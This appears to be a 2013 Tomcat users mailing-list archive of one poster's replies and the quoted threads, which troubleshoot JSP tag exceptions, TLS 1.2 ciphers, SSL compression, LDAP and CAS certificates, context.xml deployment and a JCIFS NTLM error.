quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.


 From: divya.prak...@mahindracomviva.com
 To: users@tomcat.apache.org
 

RE: JspTagException- Stream closed

[Martin Gainty]

where is the iter attribute declaration for selection HTML tag?

http://www.w3schools.com/tags/tag_select.asp

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung
 
Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.




 From: tinu.b...@amd.com
 To: users@tomcat.apache.org
 Subject: RE: JspTagException- Stream closed
 Date: Thu, 5 Sep 2013 04:09:34 +
 
  Here is the body of the method doEndTag(). The exception is thrown for line 
 number 146, which isthis.iter = null;   of the reset method.
 
  public int doEndTag()
 throws JspException
   {
 if (this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent != 
 null)
 {
   try
   {
 
 this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent.writeOut(this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent.getEnclosingWriter());
   }
   catch (IOException localIOException)
   {
 
 this.jdField_pageContext_of_type_JavaxServletJspPageContext.getServletContext().log(Res.getString(4),
  localIOException);
 throw new JspTagException(localIOException.getMessage());
   }
 }
 
 reset();
 
 return 6;
   }
 
   private void reset()
   {
 this.sDataSource = null;
 this.changeCurrentRow = true;
 this.useRange = false;
 this.ds = null;
 this.rs = null;
 this.iter = null;
   }
 
 
 
 
 -Original Message-
 From: Babu, Tinu [mailto:tinu.b...@amd.com] 
 Sent: Monday, August 26, 2013 2:51 PM
 To: Tomcat Users List
 Subject: RE: JspTagException- Stream closed
 
 
 
 The RowSetIterate tag is declared in the JSP itself. All the JSPs having this 
 RowSetIterate tag is throwing Stream closed exception. 
 
 
 -Original Message-
 From: Christopher Schultz [mailto:ch...@christopherschultz.net]
 Sent: Wednesday, August 21, 2013 9:41 PM
 To: Tomcat Users List
 Subject: Re: JspTagException- Stream closed
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256
 
 Tinu,
 
 On 8/20/13 9:59 PM, Babu, Tinu wrote:
  Here is the piece of codes which is throwing the error.
  
  select name=list1 size=15 multiple jbo:RowsetIterate 
  datasource=userRole  option value=jbo:ShowValue 
  datasource=userRole  dataitem=RoleName / jbo:ShowValue 
  datasource=userRole  dataitem=RoleDesc / /option 
  /jbo:RowsetIterate /select
  
  select name=list2 size=15 multiple jbo:RowsetIterate 
  datasource=roles  option value=jbo:ShowValue datasource=roles
  dataitem=RoleName / jbo:ShowValue datasource=roles  
  dataitem=RoleDesc / /option /jbo:RowsetIterate /select
  
  Exception is always being thrown from the RowSetIterate Tags in JSPs. 
  This was working properly with Tomcat4 version and when we upgraded 
  our Tomcat to version 6 we started getting this strange exception.
  
  Please share your thoughts.
 
 Where is the row set itself declared? In the JSP? In a servlet somewhere that 
 executes before the JSP?
 
 In general, I wouldn't recommend making any JDBC calls from within a
 JSP: I prefer to take care of all data acquisition in a servlet (or
 similar) before delegating the creation of a response to the view layer. But 
 that's just me.
 
 - -chris
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.14 (Darwin)
 Comment: GPGTools - http://gpgtools.org
 Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
 iQIcBAEBCAAGBQJSFMNUAAoJEBzwKT+lPKRYRDUQAMs3ugmVpr/K0kGMRIV2xHvG
 cb7Kd2uWrvAnFLqgbj6GuMFQvWsTXcbA3tlaa+iY3FSQEchFnzktONVdqml6CGsB
 UdumVqg0GFPI9vPM7nq4EOxTZg6QlaVsy2LJ0hbmc4vFaYD6s4uz21yd2IMZ8MJy
 FjGx6JylFn1c9RjLBegWRWUS3ykkapaZ8lwJU+QUnI1WxLp8mg37FV7ziwKIk5u5
 yKc1nquQ/cj2aqUiEdpC2CEwmy05m2APiDmGT/UkKuZoHMRG1/OzLFlKg65RhlvB
 x0iPSDZv6iP/neZEtGmOsYiQLG9F5/v4ziV+kgsJYbhmb6jtYIYiHcBYrn425Q2W
 ERhqEuYRXR+2yRxt3/xzB0uSyg3eikhfwNoOrFH2OGgk4cpzSZJRW/E0N2EUYUwr
 ZRuGpOr4wgpPOrJ3A02hGYpBz2ZtbiingTl/72IlLcgBnBUapWzSazPl4BE7gPe/
 VToMDtlxm74qiqtvr8C8swGAK9Y2xwmFkFI2GF2tu7STgbDfIA7f8eILYo3+m57S
 3oI/O4aVf38HiKuA5pZmahSU5mLtCi4Fj0RmzDSSwLgi0WYfgUzCsqKDJKFns2qe
 PRNEyA8w7X4IKI4oJKgP/C7+gl3g8xycEo2C04Q6ZlZHjqfSBqJi6KnxJfdZLoYt
 t18eSlW8KZBzKKHP7QpT
 =011K
 -END PGP SIGNATURE-
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 -
 To 

RE: How to retrieve OCSP Information at server side(In Servlet) Tomact ver 7.0.40/Centos

[Martin Gainty]

  


 Date: Tue, 3 Sep 2013 13:15:47 +0530
 Subject: How to retrieve OCSP Information at server side(In Servlet) Tomact 
 ver 7.0.40/Centos
 From: sushil.pru...@gmail.com
 To: users@tomcat.apache.org
 
 HI All
 
 I want to retrieve OCSP information at server side in servlet .
 So currently i am using
 X509Certificate certChain[] = (X509Certificate[])
 request.getAttribute(javax.servlet.request.X509Certificate);
MGassuming 'someone' was smart enough to place certificate name into 
javax.servlet.request.X509Certificate a-priori
 
 ans also i have configured below value at /conf/server.xml
 truststoreFile=/LocalDev/software/ssl/server/server.ks
 truststorePass=password
 and clientAuth=want
 Even though i am unable to retrieve value ,It's giving null.
 
 
 ANy idea is there any extra configuration i need to do at tomcat side?

MGdifference between accessing truststore and accessing keystore
http://stackoverflow.com/questions/318441/truststore-and-keystore-definitions   
  

RE: Unable to start apache tomcat server

[Martin Gainty]

In other words ...this was an eclipse plugin misconfiguration?

If so does eclipse have a support site for plugin misconfiguration(s)?

Martin Gainty 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  


 Date: Sun, 1 Sep 2013 00:27:09 +0530
 Subject: Re: Unable to start apache tomcat server
 From: sushil.pru...@gmail.com
 To: users@tomcat.apache.org
 
 Hi Brit/Marc
 
 Thanks for your time . Problem got resolved using below url.
 http://stackoverflow.com/questions/8520267/localhost8080-gives-404-the-requested-resource-is-not-available
 
 
 On Sun, Sep 1, 2013 at 12:08 AM, Burghard W.V. Britzke 
 b...@charmides.in-berlin.de wrote:
 
  pardon! the word resource could be confusing - the better expression is
  web application which is mapped to /
  so the web application which is mapped to / is missing or is not
  configured.
 
  Am 31.08.2013 um 20:34 schrieb Burghard W.V. Britzke 
  b...@charmides.in-berlin.de:
 
   but this means that tomcat is up and running (like Marc stated before).
  only the resource / is missing. what is the content of your webapps
  directory?
  
   Am 31.08.2013 um 20:03 schrieb Sushil Prusty sushil.pru...@gmail.com:
  
   Hi
  
   I am very sorry i am using http://localhost:8080 not https://.
   I am getting below status when i am opening .
   HTTP Status 404 - /
  
   type Status report
  
   message /
  
   description The requested resource is not available.
   Apache Tomcat/7.0.42
  
  
   On Sat, Aug 31, 2013 at 11:27 PM, Caldarale, Charles R 
   chuck.caldar...@unisys.com wrote:
  
   From: Sushil Prusty [mailto:sushil.pru...@gmail.com]
   Subject: Re: Unable to start apache tomcat server
  
   I am using https://localhost:8080.
  
   Use http, not https. If you want to use https, you will need to
  configure
   an additional Connector (usually on port 8443), including
  establishing a
   server certificate.
  
   - Chuck
  
  
   THIS COMMUNICATION MAY CONTAIN CONFIDENTIAL AND/OR OTHERWISE
  PROPRIETARY
   MATERIAL and is thus for use only by the intended recipient. If you
   received this in error, please contact the sender and delete the
  e-mail and
   its attachments from all computers.
  
  
   -
   To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
   For additional commands, e-mail: users-h...@tomcat.apache.org
  
  
  
 
 
  

RE: Tomcat 7 / Java 7 with TLS 1.2 algorithms

[Martin Gainty]

what's supposed to happen:


The specified cipher in SSLCipherSuiteSSLCipherSuite is supposed to be enabled 
when specified within 

SSLCipherSuiteSSLCipherSuite=SHA256/384


to allow the Server to arbitrate the ordering of ciphers(instead of the client) 

SSLHonorCipherOrder=true


http://tomcat.apache.org/tomcat-7.0-doc/config/http.html


does this not work for you?


Martin Gainty 
__ 
Please do not alter or disrupt this transmission..Thank You

  



From: d...@sosnoski.com
Subject: Tomcat 7 / Java 7 with TLS 1.2 algorithms
To: users@tomcat.apache.org
CC: 
Date: Thu, 22 Aug 2013 04:41:54 -0400

Tomcat 7.0.40 seems to work well with TLS 1.2, forced by using a 
sslEnabledProtocols=TLSv1.2 attribute on the Connector. But I haven't been 
able to make it work with any of the SHA256/384 algorithms - they always show 
up in the Ignoring unsupported cipher suite list. I get the same thing 
happening when I try to use them from client code, so I know it's not a Tomcat 
issue, but I'm hoping someone knows a workaround.
 
Any suggestions?
 
Thanks,
 
  - Dennis
 

- To 
unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional 
commands, e-mail: users-h...@tomcat.apache.org  
 

RE: Tomcat 7 / Java 7 with TLS 1.2 algorithms

[Martin Gainty]

point of confusion Eric Rescorla specifically cites SHA384 in his cipher 
examples for TLS 1.2 Update

http://www.ietf.org/rfc/rfc5246.txt
http://www.ietf.org/proceedings/70/slides/tls-0.pdf

Kuat Eshengazin used bltest as a test harness for SHA384
 
bltest -R -m prf_sha384 -k tests/prf_sha384/key0 -t
tests/prf_sha384/seed0 -h -g 148 -x

https://bugzilla.mozilla.org/show_bug.cgi?id=480514
 
Is this incorrect?
Martin 
__ 
Please do not alter or disrupt this transmission..Thank You

  


 Date: Thu, 22 Aug 2013 14:53:55 +0100
 Subject: Re: Tomcat 7 / Java 7 with TLS 1.2 algorithms
 From: aterrest...@gmail.com
 To: users@tomcat.apache.org
 
 According to RFC 5246 Appendix C (TLS 1.2), there is no SHA384. See :
 http://www.ietf.org/rfc/rfc5246.txt
 
 The JSSE Reference Guide also doesn't talk about this SHA384 as an
 implementation requirement. See :
 http://docs.oracle.com/javase/7/docs/technotes/guides/security/StandardNames.html#impl
 
 This means you have a problem with SHA256 only. Maybe it's easier to
 test on client-side, with one of the following ciphers (that you find
 on the same Reference Guide ) for example :
 
 TLS_DH_RSA_WITH_AES_256_CBC_SHA256
 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
 
 Let me know if this works, or I will try to test by myself with my own client.
 
 
 
 2013/8/22 Dennis Sosnoski d...@sosnoski.com:
  I've already done that, though as far as I can see that doesn't effect the
  digest algorithms (only the encryption options).
 
  - Dennis
 
 
  On 08/23/2013 12:24 AM, Aurélien Terrestris wrote:
 
  Hello
 
  I suppose you need to run your JVM with the unrestricted policy files (on
  b=
  oth client and server sides). You have to download them from Oracle
  website=
  for your java version, and replace the old.
 
  These files are :
  local_policy.jar
  US_export_policy.jar
 
  Regards
 
  2013/8/22 d...@sosnoski.com:
 
  Tomcat 7.0.40 seems to work well with TLS 1.2, forced by using a
  sslEnabledProtocols=TLSv1.2 attribute on the Connector. But I haven't
  been able to make it work with any of the SHA256/384 algorithms - they
  always show up in the Ignoring unsupported cipher suite list. I get the
  same thing happening when I try to use them from client code, so I know 
  it's
  not a Tomcat issue, but I'm hoping someone knows a workaround.
 
  Any suggestions?
 
  Thanks,
 
  - Dennis
 
 
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Tomcat config question: 'compression' versus 'SSLDisableCompression'

[Martin Gainty]

as earlier mentioned 
 
chrome is the only browser that supports compression on SSL streams

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.


 
 Date: Thu, 8 Aug 2013 17:47:36 -0400
 Subject: Re: Tomcat config question: 'compression' versus 
 'SSLDisableCompression'
 From: dlan...@gmail.com
 To: users@tomcat.apache.org
 
 On Thu, Aug 8, 2013 at 5:19 PM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
 
  ... and the SSLDisableCompression setting (when set to false) is
  intended to mitigate the CRIME attack against SSL/TLS compression.
  Feel free to read online all about the CRIME attack.
 
 
 That was what I was hoping it did when I asked the original question :)
 
 
  I haven't really done any analysis of SSL compression (that is,
  compression as implemented by the TLS/SSL layer) alone versus
  compression-less-SSL + gzip, but I suspect that any combination of
  compression and encryption can lead to CRIME-like attacks ...
 
 
 That seems to be true since there is now the BREACH attack:
 
 http://arstechnica.com/security/2013/08/gone-in-30-seconds-new-attack-plucks-secrets-from-https-protected-pages/
 
 which (I think) is compression-less-SSL + gzip.
  

RE: LDAP/Realm with TLS in Tomcat 6/7?

[Martin Gainty]

you will need to supply any security credentials to that  layer and inform the 
connector you are using protocol=TLS 
and match each attribute to attribute from the supplied key package (.pfx/.p7b)
 
http://tomcat.apache.org/tomcat-4.1-doc/ssl-howto.html
 
HTH,
Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
 Date: Tue, 6 Aug 2013 13:36:41 +0200
 From: ognjen.d.blagoje...@gmail.com
 To: users@tomcat.apache.org
 Subject: Re: LDAP/Realm with TLS in Tomcat 6/7?
 
 Jens,
 
 On 6.8.2013 12:44, Jens Neu wrote:
  is there a lib/method/whatever to achieve Realm Auth in Tomcat  5.x where
  username/password are protected by TLS?
 
 I never tried it myself, but you might find these links useful:
 
https://wiki.apache.org/tomcat/JNDI_startTLs_HowTo
https://issues.apache.org/bugzilla/show_bug.cgi?id=49785
https://www.mail-archive.com/users@tomcat.apache.org/msg80660.html
 
 
  org.apache.catalina.realm.JNDIRealm works with Tomcat 5, but not in 6 :-(
 
 JNDIRealm should work just fine in any supported Tomcat version. If you 
 have any problems with it, please report it here.
 
 BTW, if you are already upgrading, you may consider to upgrade directly 
 to latest Tomcat 7, to save yourself from doing two upgrades.
 
 -Ognjen
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: /META-INF/context.xml seemingly ignored

[Martin Gainty]

Nicholas possibly CATALINA_BASE environment variable is missing? 
http://blog.andrewbeacock.com/2007/08/getting-tomcat-contexts-to-work-in.html

gotta love those brit techs!
Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
 Subject: Re: /META-INF/context.xml seemingly ignored
 From: nicho...@nicholaswilliams.net
 Date: Sun, 4 Aug 2013 14:47:49 -0500
 To: users@tomcat.apache.org
 
 
 On Aug 4, 2013, at 11:16 AM, Konstantin Kolinko wrote:
 
  2013/8/4 Mark Thomas ma...@apache.org:
  On 04/08/2013 02:27, Nick Williams wrote:
  
  
  Yes. There's a TOMCAT_HOME/work/Catalina/localhost/support directory, but 
  TOMCAT_HOME/conf/Catalina is empty.
  
  There should be conf/Catalina/localhost directory that is empty. (The
  Catalina directory is not empty).
 
 Yes, my bad. conf/Catalina/localhost exists but is empty.
 
  
  
  As expected for Tomcat 8. copyXML is false by default.
  
  (Yes the default has changed again.)
  
  Huh? The copyXML is false by default in Tomcat 7 as well. I do not see
  any change here.
  
  It might be good time to start migration guide page for Tomcat 8.
 
 Agreed.
 
 So, looking at this further, this might be an IntelliJ IDEA bug. I'm 
 deploying the application using the Tomcat support in IDEA. IDEA creates a 
 directory 
 C:\Users\Nicholas\.IntelliJIdea12\system\tomcat\Unnamed_Customer-Support-v15\conf\Catalina\localhost
  and that directory contains support.xml with my context.xml contents. I'm 
 betting it's not hooking that up properly. I'll research that route instead.
 
 Sorry if I've wasted anyone's time looking into this.
 
 Nick
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Cert

[Martin Gainty]

Daniel
 
...he hasn't imported his DER typed certificate into the LDAP Server yet..

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
 Subject: Re: Cert
 From: dmik...@gopivotal.com
 Date: Fri, 2 Aug 2013 08:58:12 -0400
 To: users@tomcat.apache.org
 
 On Aug 2, 2013, at 7:33 AM, Kyle Shattuck ky...@montcalm.edu wrote:
 
  Hello,
  I am using Tomcat 7 on a windows server 2012 build for this: 
  https://wiki.jasig.org/display/CASUM/Best+Practice+-+Setting+Up+CAS+Locally+using+the+Maven2+WAR+Overlay+Method
  
  I don't think SSL is not working correctly because every time I try to 
  authenticate over LDAPS it does not work.
 
 What part of this doesn't work?  Connecting via SSL or authentication via 
 LDAP?  They are two different things.
 
 Can you connect to your server via HTTPS and access a static resource like an 
 HTML page or image file?  If not, what happens when you try to connect?
 
  
  I created a .csr and a .jks using the java keytool. I got a cert using my 
  .csr file from digicert by downloading it to a .p7b file. I imported the 
  .p7b file to my %jave_home%\bin\mykeystore.jks. I then download from 
  digicert the same cert but in a .pem file and imported the file to my 
  %jave_home5\jre\lib\security\cacerts.
  
  Did I miss something here, do you need any other info?
 
  - What is the specific version of Tomcat that you are using?
  - Do you see any errors in the log?
  - Include your server.xml, minus comments and minus any sensitive info like 
 passwords
 
 Dan
 
  
  Thank you,
  Kyle
  
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Cert

[Martin Gainty]

Kyle
 
the ldap server requires the LDAP Attributes contained within the p7b

dn: cn=username,o=organization,c=country
objectclass:inetorgperson
objectclass:organizationalPerson
cn: username
sn: surname

your LDAP admin has 2 options:

1)enter each one manually from the attributes enumerated from the cert 
2) import your DER formatted certificate into LDAP (and let the import utility 
auto-populate the LDAP attributes) for example
2a)Cisco LDAP Server
http://www.cisco.com/en/US/docs/switches/datacenter/sw/6_x/nx-os/security/configuration/guide/b_Cisco_Nexus_7000_NX-OS_Security_Configuration_Guide__Release_6.x_chapter_0111.html
2b)IBM LDAP Server
http://pic.dhe.ibm.com/infocenter/tivihelp/v2r1/index.jsp?topic=%2Fcom.ibm.itamfbi.doc_5.1%2FADM51mst160.htm

it looks like we will need to engage the LDAP admin to take this any 
further..can you cc him?

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
From: ky...@montcalm.edu
To: users@tomcat.apache.org
Subject: RE: Cert
Date: Fri, 2 Aug 2013 13:23:12 +

My Server( CAS) is using SSL and the LDAP(DC) server uses SSL. So when I try to 
authenticate through my CAS server to DC over LDAPS it does not work. When I 
look at the logs of the Applications and Services Logs --Directory Service 
is says--
InformationActiveDirectory_DomainService1535LDAP Interface:
Internal event: The LDAP server returned an error. 
 
Additional Data 
Error value:
0003: LdapErr: DSID-0C060463, comment: Error decrypting ldap message, data 
0, v1db1
 
Tomcat version:apache-tomcat-7.0.42
 
-Original Message-
From: Daniel Mikusa [mailto:dmik...@gopivotal.com] 
Sent: Friday, August 02, 2013 8:59 AM
To: Tomcat Users List
Subject: Re: Cert
 
On Aug 2, 2013, at 7:33 AM, Kyle Shattuck ky...@montcalm.edu wrote:
 
 Hello,
 I am using Tomcat 7 on a windows server 2012 build for this: 
 https://wiki.jasig.org/display/CASUM/Best+Practice+-+Setting+Up+CAS+Locally+using+the+Maven2+WAR+Overlay+Method
 
 I don't think SSL is not working correctly because every time I try to 
 authenticate over LDAPS it does not work.
 
What part of this doesn't work?  Connecting via SSL or authentication via LDAP? 
 They are two different things.
 
Can you connect to your server via HTTPS and access a static resource like an 
HTML page or image file?  If not, what happens when you try to connect?
 
 
 I created a .csr and a .jks using the java keytool. I got a cert using my 
 .csr file from digicert by downloading it to a .p7b file. I imported the .p7b 
 file to my %jave_home%\bin\mykeystore.jks. I then download from digicert the 
 same cert but in a .pem file and imported the file to my 
 %jave_home5\jre\lib\security\cacerts.
 
 Did I miss something here, do you need any other info?
 
 - What is the specific version of Tomcat that you are using?
 - Do you see any errors in the log?
 - Include your server.xml, minus comments and minus any sensitive info like 
passwords
 
Dan
 
 
 Thank you,
 Kyle
 
 
 
-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
 
 

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org   
  

RE: java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx

[Martin Gainty]

nslookup DomainName

if you still call no joy there is nothing we can do (without contacting your 
Domain Admin and asking if DomainName is live)

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
 From: seema...@hotmail.com
 To: users@tomcat.apache.org
 Subject: RE: java.net.UnknownHostException: Failed to negotiate with a 
 suitable domain controller for xxx
 Date: Thu, 1 Aug 2013 12:02:34 +0100
 
 
 
  Date: Thu, 1 Aug 2013 12:06:39 +0200
  From: a...@ice-sa.com
  To: users@tomcat.apache.org
  Subject: Re: java.net.UnknownHostException: Failed to negotiate with a 
  suitable domain controller for xxx
  
  Seema Patel wrote:
   Hi,

   I am not sure if this is the right List to post this on, please advise if 
   it isn't and let me know where is best to post.

   I am getting the following error on one of our applications running on 
   our intranet:

   2013-07-31 17:15:11,180 [http-xxx.xxx.x.xxx-xx-x] ERROR 
   org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/forms].[action]
- Servlet.service() for servlet action threw exception
   java.net.UnknownHostException: Failed to negotiate with a suitable domain 
   controller for xxx.LOCAL
   at jcifs.smb.SmbSession.getChallengeForDomain(SmbSession.java:187)
   at jcifs.http.NtlmHttpFilter.negotiate(NtlmHttpFilter.java:150)
   at jcifs.http.NtlmHttpFilter.doFilter(NtlmHttpFilter.java:114)
   at 
   org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215)
   at 
   org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188)
   at 
   org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213)
   at 
   org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:172)
   at 
   org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:465)
   at 
   org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
   at 
   org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)
   at 
   org.apache.catalina.authenticator.SingleSignOn.invoke(SingleSignOn.java:393)
   at 
   org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108)
   at 
   org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:174)
   at 
   org.apache.coyote.http11.Http11AprProcessor.process(Http11AprProcessor.java:837)
   at 
   org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler.process(Http11AprProtocol.java:640)
   at 
   org.apache.tomcat.util.net.AprEndpoint$Worker.run(AprEndpoint.java:1287)
   at java.lang.Thread.run(Unknown Source)

  
  I believe that you should read this page carefully, in particular the blue 
  text at the 
  beginning : http://jcifs.samba.org/src/docs/ntlmhttpauth.html
  
  Can you have a look at the WEB-INF/web.xml file *of your application*, and 
  check if there 
  is a servlet filter configured there, which matches the name above ?
  
  If so, make a backup copy of that web.xml file, and then edit it to remove 
  that filter 
  from it, and try again.
  I am not quite sure, but it looks possible to me that you have a duplicate 
  authentication 
  mechanism in use : one at the container (Tomcat) level, and one at the 
  application level.
  And the one used at the application level is obsolete, unsupported, 
  unmaintained etc..
  
 
 I have found out that JCIFS is no longer supported, but it will take a lot of 
 time, development and resources to update it to the recommended Jespa.  In my 
 web.xml file I have the following:
 
 filter
 filter-nameNtlmHttpFilter/filter-name
